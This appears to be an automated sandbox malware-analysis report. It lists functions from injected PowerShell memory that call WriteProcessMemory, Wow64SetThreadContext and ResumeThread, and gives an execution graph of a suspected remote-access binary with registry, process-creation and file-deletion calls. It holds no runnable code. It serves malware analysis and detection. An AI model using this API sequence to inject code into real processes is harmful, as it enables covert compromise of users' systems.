                                  Signature Coverage:0%
                                  Total number of Nodes:12
                                  Total number of Limit Nodes:0

                                  Executed Functions

                                  Function 00007FFD345B6B6F Relevance: 2.4, APIs: 1, Instructions: 904COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2882325337.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38739a207d8f8d1d8d82b0aa9dec84154fa122144970a0d983ad4e75c59be861
                                  • Instruction ID: 1c6af9da75adddb181c26793aabd1885e7fca09b44612df20a720a16ba5f92c5
                                  • Opcode Fuzzy Hash: 38739a207d8f8d1d8d82b0aa9dec84154fa122144970a0d983ad4e75c59be861
                                  • Instruction Fuzzy Hash: BFD19631A18E8D4FDB65DF18C8967E977E1FB59310F00422AED4DC7391DE78A9418B82
                                  Function 00007FFD34681490 Relevance: 1.7, Strings: 1, Instructions: 493COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 120 7ffd34681490-7ffd3468150f 123 7ffd3468169f-7ffd346816fd 120->123 124 7ffd34681515-7ffd3468151f 120->124 149 7ffd346816ff-7ffd3468171d 123->149 150 7ffd34681728-7ffd3468174d 123->150 125 7ffd34681521-7ffd3468152f 124->125 126 7ffd34681539-7ffd3468153f 124->126 125->126 131 7ffd34681531-7ffd34681537 125->131 127 7ffd34681634-7ffd3468163e 126->127 128 7ffd34681545-7ffd34681548 126->128 132 7ffd34681651-7ffd3468169c 127->132 133 7ffd34681640-7ffd34681650 127->133 134 7ffd34681591 128->134 135 7ffd3468154a-7ffd3468155d 128->135 131->126 132->123 138 7ffd34681593-7ffd34681595 134->138 135->123 145 7ffd34681563-7ffd3468156d 135->145 138->127 142 7ffd3468159b-7ffd3468159e 138->142 142->127 146 7ffd346815a4-7ffd346815a7 142->146 151 7ffd3468156f-7ffd34681584 145->151 152 7ffd34681586-7ffd3468158f 145->152 146->127 148 7ffd346815ad-7ffd346815e1 146->148 148->127 172 7ffd346815e3-7ffd346815e9 148->172 160 7ffd3468171e-7ffd34681725 149->160 164 7ffd3468174f-7ffd34681755 150->164 165 7ffd34681759-7ffd34681765 150->165 151->152 152->138 166 7ffd34681726 160->166 164->165 167 7ffd34681771-7ffd34681783 165->167 168 7ffd34681767-7ffd3468176d 165->168 166->150 167->160 169 7ffd34681785-7ffd3468178b 167->169 168->167 169->166 171 7ffd3468178d-7ffd346817f4 169->171 180 7ffd3468183b-7ffd34681845 171->180 181 7ffd346817f6-7ffd34681838 171->181 174 7ffd346815eb-7ffd34681606 172->174 175 7ffd34681608-7ffd3468161e 172->175 174->175 179 7ffd34681624-7ffd34681633 175->179 184 7ffd34681850-7ffd3468189b 180->184 185 7ffd34681847-7ffd3468184f 180->185 181->180
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: M_H
                                  • API String ID: 0-3997733227
                                  • Opcode ID: bfa1d1c6b51b9426c5e5fbf69ff104492966b3e21b1b2d6758a6106df5710a18
                                  • Instruction ID: ce808b4aeadab14dc29f7ff527abd858f4e9b4c1143eebb60800b0677e8f0b5e
                                  • Opcode Fuzzy Hash: bfa1d1c6b51b9426c5e5fbf69ff104492966b3e21b1b2d6758a6106df5710a18
                                  • Instruction Fuzzy Hash: C3E13772B0DBD94FE7A69B2858A51F47BE1EF57220B0801FFD589C7193E91C9C468342
                                  Function 00007FFD345B67E4 Relevance: 1.7, APIs: 1, Instructions: 151injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 192 7ffd345b67e4-7ffd345b67eb 193 7ffd345b67f6-7ffd345b6809 192->193 194 7ffd345b67ed-7ffd345b67f5 192->194 195 7ffd345b680b-7ffd345b6871 193->195 196 7ffd345b6872-7ffd345b6885 193->196 194->193 195->196 200 7ffd345b6887-7ffd345b688c 196->200 201 7ffd345b688f-7ffd345b68e4 WriteProcessMemory 196->201 200->201 203 7ffd345b68e6 201->203 204 7ffd345b68ec-7ffd345b691d 201->204 203->204
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2882325337.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 7b9b4f628bc0ae5dea13660fe14b8ceef99c2e5186b2e8be63e5ed4be1382911
                                  • Instruction ID: 2cc5968b5b0c149ec952eaf98a3a63113bcf400bd17330e9d76ed587b7e3ef2d
                                  • Opcode Fuzzy Hash: 7b9b4f628bc0ae5dea13660fe14b8ceef99c2e5186b2e8be63e5ed4be1382911
                                  • Instruction Fuzzy Hash: 3841C831D0CB484FDB689B9898566FD7BE1EB55311F00426FE489D3252DF74A8468782
                                  Function 00007FFD345B65D8 Relevance: 1.6, APIs: 1, Instructions: 129threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 206 7ffd345b65d8-7ffd345b65df 207 7ffd345b65ea-7ffd345b65f9 206->207 208 7ffd345b65e1-7ffd345b65e9 206->208 209 7ffd345b65fb-7ffd345b665d 207->209 210 7ffd345b6662-7ffd345b6664 207->210 208->207 211 7ffd345b6667-7ffd345b66a2 Wow64SetThreadContext 209->211 218 7ffd345b665f-7ffd345b6660 209->218 210->211 215 7ffd345b66aa-7ffd345b66d9 211->215 216 7ffd345b66a4 211->216 216->215 218->210
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2882325337.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: d51586279f62a5c536235f66eacf12916c96e84264e5b7a1c72609f7cf8d5dc5
                                  • Instruction ID: 3db2a6f7f3b2836d4f7070fa43bd5d1a045ff6716430c8cd017e50bfe4540898
                                  • Opcode Fuzzy Hash: d51586279f62a5c536235f66eacf12916c96e84264e5b7a1c72609f7cf8d5dc5
                                  • Instruction Fuzzy Hash: C031F831D0CB484FDB299FA898556FA7BE5EB56311F04423FD44AD3192DF78A4068781
                                  Function 00007FFD345B64DD Relevance: 1.6, APIs: 1, Instructions: 116threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 220 7ffd345b64dd-7ffd345b64e9 221 7ffd345b64eb-7ffd345b64f3 220->221 222 7ffd345b64f4-7ffd345b6503 220->222 221->222 223 7ffd345b6505-7ffd345b650d 222->223 224 7ffd345b650e-7ffd345b65a4 ResumeThread 222->224 223->224 229 7ffd345b65a6 224->229 230 7ffd345b65ac-7ffd345b65d1 224->230 229->230
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2882325337.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: cd949f4abedafd88befcbc2de90d4b02dd34472219f702904112c252eececbf0
                                  • Instruction ID: 06fb8633d163e432f64e79ad43e72984c8c0837b46cc8539a4e759b586803c6a
                                  • Opcode Fuzzy Hash: cd949f4abedafd88befcbc2de90d4b02dd34472219f702904112c252eececbf0
                                  • Instruction Fuzzy Hash: 7731593190D7884FDB5ADBA888966E97FE0EF53320F0842AFD049C71A3CA789415CB52
                                  Function 00007FFD34680564 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: hz4
                                  • API String ID: 0-2199005916
                                  • Opcode ID: c470ccfde8e99781287a713d7c402706634bcd2c7757170f860208b3025d8d3a
                                  • Instruction ID: c29a698bf51033c66f3574b3656785cddf99b8916479e656993a5879b93b4ed4
                                  • Opcode Fuzzy Hash: c470ccfde8e99781287a713d7c402706634bcd2c7757170f860208b3025d8d3a
                                  • Instruction Fuzzy Hash: 00412422B1DF6A0BE7E98E5C14A12F5B7C2EF96620F4906BBC54DD31C2ED08EC415281
                                  Function 00007FFD34680715 Relevance: .7, Instructions: 696COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 349 7ffd34680715-7ffd34680733 353 7ffd3468075e-7ffd34680787 349->353 354 7ffd34680735-7ffd3468075c 349->354 359 7ffd3468078e-7ffd34680790 353->359 360 7ffd34680789 353->360 354->353 362 7ffd34680791-7ffd3468079f 359->362 360->359 361 7ffd3468078b 360->361 361->359 363 7ffd346807a1 362->363 364 7ffd346807a6-7ffd346807b8 362->364 363->364 365 7ffd346807a3 363->365 364->362 366 7ffd346807ba-7ffd34680837 364->366 365->364 368 7ffd3468098f-7ffd346809e9 366->368 369 7ffd3468083d-7ffd34680847 366->369 389 7ffd34680a14-7ffd34680a41 368->389 390 7ffd346809eb-7ffd34680a05 368->390 370 7ffd34680863-7ffd34680870 369->370 371 7ffd34680849-7ffd34680861 369->371 378 7ffd34680930-7ffd3468093a 370->378 379 7ffd34680876-7ffd34680879 370->379 371->370 381 7ffd3468093c-7ffd34680948 378->381 382 7ffd34680949-7ffd3468098c 378->382 379->378 383 7ffd3468087f-7ffd34680887 379->383 382->368 383->368 386 7ffd3468088d-7ffd34680897 383->386 387 7ffd346808b0-7ffd346808b4 386->387 388 7ffd34680899-7ffd346808a9 386->388 387->378 392 7ffd346808b6-7ffd346808b9 387->392 394 7ffd346808df-7ffd346808f9 388->394 395 7ffd346808ab-7ffd346808ae 388->395 411 7ffd34680a44-7ffd34680a55 389->411 412 7ffd34680a43 389->412 401 7ffd34680a06-7ffd34680a12 390->401 396 7ffd346808d0-7ffd346808d4 392->396 397 7ffd346808bb-7ffd346808c4 392->397 410 7ffd346808fb-7ffd34680909 394->410 395->387 396->378 405 7ffd346808d6-7ffd346808dc 396->405 397->396 401->389 409 7ffd346808de 405->409 405->410 409->394 419 7ffd34680922-7ffd3468092f 410->419 420 7ffd3468090b-7ffd34680918 410->420 413 7ffd34680a58-7ffd34680a6b 411->413 414 7ffd34680a57 411->414 412->411 413->401 415 7ffd34680a6d-7ffd34680aa8 413->415 414->413 417 7ffd34680aac-7ffd34680ae4 415->417 418 7ffd34680aaa 415->418 425 7ffd34680aea-7ffd34680af4 417->425 426 7ffd34680c09-7ffd34680c63 417->426 418->417 420->419 424 7ffd3468091a-7ffd34680920 420->424 424->419 427 7ffd34680b0d-7ffd34680b12 425->427 428 7ffd34680af6-7ffd34680b03 425->428 451 7ffd34680c8e-7ffd34680cb9 426->451 452 7ffd34680c65-7ffd34680c8c 426->452 432 7ffd34680baa-7ffd34680bb4 427->432 433 7ffd34680b18-7ffd34680b1b 427->433 428->427 434 7ffd34680b05-7ffd34680b0b 428->434 437 7ffd34680bc3-7ffd34680c06 432->437 438 7ffd34680bb6-7ffd34680bc2 432->438 433->432 436 7ffd34680b21-7ffd34680b24 433->436 434->427 441 7ffd34680b4b 436->441 442 7ffd34680b26-7ffd34680b49 436->442 437->426 443 7ffd34680b4d-7ffd34680b4f 441->443 442->443 443->432 448 7ffd34680b51-7ffd34680b5b 443->448 448->432 457 7ffd34680b5d-7ffd34680b67 448->457 461 7ffd34680cbc-7ffd34680ccd 451->461 462 7ffd34680cbb 451->462 452->451 458 7ffd34680b69-7ffd34680b73 457->458 463 7ffd34680b7a-7ffd34680b83 458->463 464 7ffd34680cd0-7ffd34680ce1 461->464 465 7ffd34680ccf 461->465 462->461 466 7ffd34680b9c-7ffd34680ba9 463->466 467 7ffd34680b85-7ffd34680b92 463->467 465->464 467->466 469 7ffd34680b94-7ffd34680b9a 467->469 469->466
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75a7cf775053cec09ea9576817dee6ef8b05113f9a917aa24be21c5b326cc4bf
                                  • Instruction ID: 7e42520049cbabf83c44e3daa05a566351725b11e818384b0eab843b98225eed
                                  • Opcode Fuzzy Hash: 75a7cf775053cec09ea9576817dee6ef8b05113f9a917aa24be21c5b326cc4bf
                                  • Instruction Fuzzy Hash: 87222222B0DB990FEBA69B6848B42B47BE1EF97314B0A05FBD18DC7193D91CAC05C351
                                  Function 00007FFD34680A68 Relevance: .1, Instructions: 143COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 471 7ffd34680a68-7ffd34680aa8 472 7ffd34680aac-7ffd34680ae4 471->472 473 7ffd34680aaa 471->473 476 7ffd34680aea-7ffd34680af4 472->476 477 7ffd34680c09-7ffd34680c63 472->477 473->472 478 7ffd34680b0d-7ffd34680b12 476->478 479 7ffd34680af6-7ffd34680b03 476->479 501 7ffd34680c8e-7ffd34680cb9 477->501 502 7ffd34680c65-7ffd34680c8c 477->502 482 7ffd34680baa-7ffd34680bb4 478->482 483 7ffd34680b18-7ffd34680b1b 478->483 479->478 484 7ffd34680b05-7ffd34680b0b 479->484 487 7ffd34680bc3-7ffd34680c06 482->487 488 7ffd34680bb6-7ffd34680bc2 482->488 483->482 486 7ffd34680b21-7ffd34680b24 483->486 484->478 491 7ffd34680b4b 486->491 492 7ffd34680b26-7ffd34680b49 486->492 487->477 493 7ffd34680b4d-7ffd34680b4f 491->493 492->493 493->482 498 7ffd34680b51-7ffd34680b5b 493->498 498->482 507 7ffd34680b5d-7ffd34680b73 498->507 511 7ffd34680cbc-7ffd34680ccd 501->511 512 7ffd34680cbb 501->512 502->501 513 7ffd34680b7a-7ffd34680b83 507->513 514 7ffd34680cd0-7ffd34680ce1 511->514 515 7ffd34680ccf 511->515 512->511 516 7ffd34680b9c-7ffd34680ba9 513->516 517 7ffd34680b85-7ffd34680b92 513->517 515->514 517->516 519 7ffd34680b94-7ffd34680b9a 517->519 519->516
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: febe12e7ff30eaedd0b081b2a330d1a891ff4befea223c7ac5705e30beecd4d5
                                  • Instruction ID: 863ab9141dde421d506e56aa8dd86557a448ea5a19495bebd4d1c9c47f91c384
                                  • Opcode Fuzzy Hash: febe12e7ff30eaedd0b081b2a330d1a891ff4befea223c7ac5705e30beecd4d5
                                  • Instruction Fuzzy Hash: 0B41BF22A0EFE90FE7E69B6808B52F52BE19F97304B0A04FAD58CC71A3DD1D5C059351
                                  Function 00007FFD346805B9 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000012.00000002.2888794194.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: adf6156a1757fdbe03f8053fad0a84864e23d572ab950dbeb27b169e191dceb6
                                  • Instruction ID: 24dd7a881a790956024661312e3b49d86da2687ae0657dd2148220cece33145a
                                  • Opcode Fuzzy Hash: adf6156a1757fdbe03f8053fad0a84864e23d572ab950dbeb27b169e191dceb6
                                  • Instruction Fuzzy Hash: 0911D813F1EF6A0BF3F95E5C18B51F866C2DF96A21F4A06BAD64DE21C2DC0CAC512191

                                  Execution Graph

                                  Execution Coverage:1.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:4.6%
                                  Total number of Nodes:519
                                  Total number of Limit Nodes:9
                                  execution_graph 46973 404e26 WaitForSingleObject 46974 404e40 SetEvent CloseHandle 46973->46974 46975 404e57 closesocket 46973->46975 46976 404ed8 46974->46976 46977 404e64 46975->46977 46978 404e7a 46977->46978 46986 4050e4 83 API calls 46977->46986 46980 404e8c WaitForSingleObject 46978->46980 46981 404ece SetEvent CloseHandle 46978->46981 46987 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46980->46987 46981->46976 46983 404e9b SetEvent WaitForSingleObject 46988 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46983->46988 46985 404eb3 SetEvent CloseHandle CloseHandle 46985->46981 46986->46978 46987->46983 46988->46985 46989 434918 46990 434924 ___BuildCatchObject 46989->46990 47015 434627 46990->47015 46992 43492b 46994 434954 46992->46994 47310 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 46992->47310 46998 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46994->46998 47311 4442d2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46994->47311 46996 43496d 46999 434973 ___BuildCatchObject 46996->46999 47312 444276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46996->47312 47005 4349f3 46998->47005 47313 443487 35 API calls 5 library calls 46998->47313 47026 434ba5 47005->47026 47010 434a1f 47012 434a28 47010->47012 47314 443462 28 API calls _abort 47010->47314 47315 43479e 13 API calls 2 library calls 47012->47315 47016 434630 47015->47016 47316 434cb6 IsProcessorFeaturePresent 47016->47316 47018 43463c 47317 438fb1 10 API calls 4 library calls 47018->47317 47020 434641 47025 434645 47020->47025 47318 44415f 47020->47318 47023 43465c 47023->46992 47025->46992 47384 436f10 47026->47384 47029 4349f9 47030 444223 47029->47030 47386 44f0d9 47030->47386 47032 434a02 47035 40ea00 47032->47035 47033 44422c 47033->47032 47390 446895 35 API calls 47033->47390 47392 41cbe1 LoadLibraryA GetProcAddress 47035->47392 47037 40ea1c GetModuleFileNameW 47397 40f3fe 47037->47397 47039 40ea38 47412 4020f6 47039->47412 47042 4020f6 28 API calls 47043 40ea56 47042->47043 47418 41beac 47043->47418 47047 40ea68 47444 401e8d 47047->47444 47049 40ea71 47050 40ea84 47049->47050 47051 40eace 47049->47051 47474 40fbee 116 API calls 47050->47474 47450 401e65 22 API calls 47051->47450 47054 40eade 47451 401e65 22 API calls 47054->47451 47055 40ea96 47475 401e65 22 API calls 47055->47475 47057 40eaa2 47476 410f72 36 API calls __EH_prolog 47057->47476 47059 40eafd 47452 40531e 28 API calls 47059->47452 47062 40eb0c 47453 406383 28 API calls 47062->47453 47063 40eab4 47477 40fb9f 77 API calls 47063->47477 47066 40eabd 47478 40f3eb 70 API calls 47066->47478 47067 40eb18 47454 401fe2 47067->47454 47073 401fd8 11 API calls 47075 40ef36 47073->47075 47074 401fd8 11 API calls 47076 40eb36 47074->47076 47305 443396 GetModuleHandleW 47075->47305 47466 401e65 22 API calls 47076->47466 47078 40eb3f 47467 401fc0 28 API calls 47078->47467 47080 40eb4a 47468 401e65 22 API calls 47080->47468 47082 40eb63 47469 401e65 22 API calls 47082->47469 47084 40eb7e 47085 40ebe9 47084->47085 47479 406c59 28 API calls 47084->47479 47470 401e65 22 API calls 47085->47470 47088 40ebab 47089 401fe2 28 API calls 47088->47089 47090 40ebb7 47089->47090 47093 401fd8 11 API calls 47090->47093 47091 40ebf6 47092 40ec3d 47091->47092 47481 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47091->47481 47471 40d0a4 47092->47471 47094 40ebc0 47093->47094 47480 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47094->47480 47096 40ec43 47097 40eac6 47096->47097 47483 41b354 33 API calls 47096->47483 47097->47073 47101 40ebdf 47101->47085 47103 40f38a 47101->47103 47102 40ec5e 47105 40ecb1 47102->47105 47484 407751 RegOpenKeyExA RegQueryValueExA RegCloseKey 47102->47484 47561 4139e4 30 API calls 47103->47561 47104 40ec21 47104->47092 47482 4139e4 30 API calls 47104->47482 47489 401e65 22 API calls 47105->47489 47110 40f3a0 47562 4124b0 65 API calls ___scrt_get_show_window_mode 47110->47562 47111 40ecba 47119 40ecc6 47111->47119 47120 40eccb 47111->47120 47112 40ec79 47114 40ec87 47112->47114 47115 40ec7d 47112->47115 47487 401e65 22 API calls 47114->47487 47485 407773 30 API calls 47115->47485 47117 40f388 47563 41bcef 28 API calls 47117->47563 47490 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47119->47490 47491 401e65 22 API calls 47120->47491 47121 40ec82 47486 40729b 97 API calls 47121->47486 47126 40f3ba 47564 413a5e RegOpenKeyExW RegDeleteValueW 47126->47564 47127 40ecd4 47492 41bcef 28 API calls 47127->47492 47129 40ec90 47129->47105 47133 40ecac 47129->47133 47130 40ecdf 47493 401f13 28 API calls 47130->47493 47488 40729b 97 API calls 47133->47488 47134 40f3cd 47565 401f09 11 API calls 47134->47565 47135 40ecea 47494 401f09 11 API calls 47135->47494 47139 40f3d7 47566 401f09 11 API calls 47139->47566 47140 40ecf3 47495 401e65 22 API calls 47140->47495 47143 40f3e0 47567 40dd7d 27 API calls 47143->47567 47145 40ecfc 47496 401e65 22 API calls 47145->47496 47146 40f3e5 47568 414f65 167 API calls _strftime 47146->47568 47150 40ed16 47497 401e65 22 API calls 47150->47497 47152 40ed30 47498 401e65 22 API calls 47152->47498 47154 40ed49 47155 40edbb 47154->47155 47499 401e65 22 API calls 47154->47499 47156 40edc5 47155->47156 47163 40ef41 ___scrt_get_show_window_mode 47155->47163 47158 40edce 47156->47158 47164 40ee4a 47156->47164 47505 401e65 22 API calls 47158->47505 47160 40edd7 47506 401e65 22 API calls 47160->47506 47161 40ed5e _wcslen 47161->47155 47500 401e65 22 API calls 47161->47500 47516 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47163->47516 47188 40ee45 ___scrt_get_show_window_mode 47164->47188 47166 40ede9 47507 401e65 22 API calls 47166->47507 47167 40ed79 47501 401e65 22 API calls 47167->47501 47171 40edfb 47508 401e65 22 API calls 47171->47508 47172 40ed8e 47502 40da6f 31 API calls 47172->47502 47173 40ef8c 47517 401e65 22 API calls 47173->47517 47176 40ee24 47509 401e65 22 API calls 47176->47509 47177 40efb1 47518 402093 28 API calls 47177->47518 47179 40eda1 47503 401f13 28 API calls 47179->47503 47183 40edad 47504 401f09 11 API calls 47183->47504 47184 40ee35 47510 40ce34 45 API calls _wcslen 47184->47510 47185 40efc3 47519 4137aa 14 API calls 47185->47519 47187 40edb6 47187->47155 47188->47164 47511 413982 31 API calls 47188->47511 47192 40eede ctype 47512 401e65 22 API calls 47192->47512 47193 40efd9 47520 401e65 22 API calls 47193->47520 47195 40efe5 47521 43bb2c 39 API calls _strftime 47195->47521 47198 40eff2 47200 40f01f 47198->47200 47522 41ce2c 86 API calls ___scrt_get_show_window_mode 47198->47522 47199 40eef5 47199->47173 47513 401e65 22 API calls 47199->47513 47523 402093 28 API calls 47200->47523 47203 40ef12 47514 41bcef 28 API calls 47203->47514 47204 40f003 CreateThread 47204->47200 47641 41d4ee 10 API calls 47204->47641 47207 40f034 47524 402093 28 API calls 47207->47524 47208 40ef1e 47515 40f4af 103 API calls 47208->47515 47211 40ef23 47211->47173 47214 40ef2a 47211->47214 47212 40f043 47525 41b580 79 API calls 47212->47525 47214->47097 47215 40f048 47526 401e65 22 API calls 47215->47526 47217 40f054 47527 401e65 22 API calls 47217->47527 47219 40f066 47528 401e65 22 API calls 47219->47528 47221 40f086 47529 43bb2c 39 API calls _strftime 47221->47529 47223 40f093 47530 401e65 22 API calls 47223->47530 47225 40f09e 47531 401e65 22 API calls 47225->47531 47227 40f0af 47532 401e65 22 API calls 47227->47532 47229 40f0c4 47533 401e65 22 API calls 47229->47533 47231 40f0d5 47232 40f0dc StrToIntA 47231->47232 47534 409e1f 168 API calls _wcslen 47232->47534 47234 40f0ee 47535 401e65 22 API calls 47234->47535 47236 40f0f7 47237 40f13c 47236->47237 47536 43455e 22 API calls 3 library calls 47236->47536 47538 401e65 22 API calls 47237->47538 47239 40f10c 47537 401e65 22 API calls 47239->47537 47242 40f11f 47245 40f126 CreateThread 47242->47245 47243 40f194 47541 401e65 22 API calls 47243->47541 47244 40f14c 47244->47243 47539 43455e 22 API calls 3 library calls 47244->47539 47245->47237 47645 41a045 102 API calls 2 library calls 47245->47645 47248 40f161 47540 401e65 22 API calls 47248->47540 47250 40f173 47254 40f17a CreateThread 47250->47254 47251 40f207 47547 401e65 22 API calls 47251->47547 47252 40f19d 47252->47251 47542 401e65 22 API calls 47252->47542 47254->47243 47642 41a045 102 API calls 2 library calls 47254->47642 47256 40f1b9 47543 401e65 22 API calls 47256->47543 47257 40f255 47552 41b69e 79 API calls 47257->47552 47258 40f210 47258->47257 47548 401e65 22 API calls 47258->47548 47262 40f1ce 47544 40da23 31 API calls 47262->47544 47263 40f25e 47553 401f13 28 API calls 47263->47553 47264 40f225 47549 401e65 22 API calls 47264->47549 47266 40f269 47554 401f09 11 API calls 47266->47554 47270 40f1e1 47545 401f13 28 API calls 47270->47545 47271 40f272 CreateThread 47276 40f293 CreateThread 47271->47276 47277 40f29f 47271->47277 47643 40f7e2 120 API calls 47271->47643 47272 40f23a 47550 43bb2c 39 API calls _strftime 47272->47550 47275 40f1ed 47546 401f09 11 API calls 47275->47546 47276->47277 47644 412132 137 API calls 47276->47644 47279 40f2b4 47277->47279 47280 40f2a8 CreateThread 47277->47280 47284 40f307 47279->47284 47555 402093 28 API calls 47279->47555 47280->47279 47639 412716 38 API calls ___scrt_get_show_window_mode 47280->47639 47282 40f1f6 CreateThread 47282->47251 47640 401be9 49 API calls _strftime 47282->47640 47283 40f247 47551 40c19d 7 API calls 47283->47551 47557 41353a RegOpenKeyExA RegQueryValueExA RegCloseKey 47284->47557 47287 40f2d7 47556 4052fd 28 API calls 47287->47556 47291 40f31f 47291->47143 47558 41bcef 28 API calls 47291->47558 47295 40f338 47559 413656 31 API calls 47295->47559 47300 40f34e 47560 401f09 11 API calls 47300->47560 47302 40f359 47302->47117 47303 40f381 DeleteFileW 47302->47303 47304 40f36f Sleep 47302->47304 47303->47117 47303->47302 47304->47302 47306 434a15 47305->47306 47306->47010 47307 4434bf 47306->47307 47647 44323c 47307->47647 47310->46992 47311->46996 47312->46998 47313->47005 47314->47012 47315->46999 47316->47018 47317->47020 47322 44fbe8 47318->47322 47321 438fda 8 API calls 3 library calls 47321->47025 47325 44fc05 47322->47325 47326 44fc01 47322->47326 47324 43464e 47324->47023 47324->47321 47325->47326 47328 449d26 47325->47328 47340 43502b 47326->47340 47329 449d32 ___BuildCatchObject 47328->47329 47347 445909 EnterCriticalSection 47329->47347 47331 449d39 47348 450203 47331->47348 47333 449d48 47334 449d57 47333->47334 47359 449bba 23 API calls 47333->47359 47361 449d73 LeaveCriticalSection std::_Lockit::~_Lockit 47334->47361 47337 449d52 47360 449c70 GetStdHandle GetFileType 47337->47360 47339 449d68 ___BuildCatchObject 47339->47325 47341 435036 IsProcessorFeaturePresent 47340->47341 47342 435034 47340->47342 47344 435078 47341->47344 47342->47324 47383 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47344->47383 47346 43515b 47346->47324 47347->47331 47349 45020f ___BuildCatchObject 47348->47349 47350 450233 47349->47350 47351 45021c 47349->47351 47362 445909 EnterCriticalSection 47350->47362 47370 44062d 20 API calls __dosmaperr 47351->47370 47354 45026b 47371 450292 LeaveCriticalSection std::_Lockit::~_Lockit 47354->47371 47356 450221 ___BuildCatchObject __cftoe 47356->47333 47357 45023f 47357->47354 47363 450154 47357->47363 47359->47337 47360->47334 47361->47339 47362->47357 47372 445b74 47363->47372 47365 450173 47380 446802 20 API calls __dosmaperr 47365->47380 47366 450166 47366->47365 47379 448b04 11 API calls 2 library calls 47366->47379 47368 4501c5 47368->47357 47370->47356 47371->47356 47377 445b81 __Getctype 47372->47377 47373 445bc1 47382 44062d 20 API calls __dosmaperr 47373->47382 47374 445bac RtlAllocateHeap 47375 445bbf 47374->47375 47374->47377 47375->47366 47377->47373 47377->47374 47381 443001 7 API calls 2 library calls 47377->47381 47379->47366 47380->47368 47381->47377 47382->47375 47383->47346 47385 434bb8 GetStartupInfoW 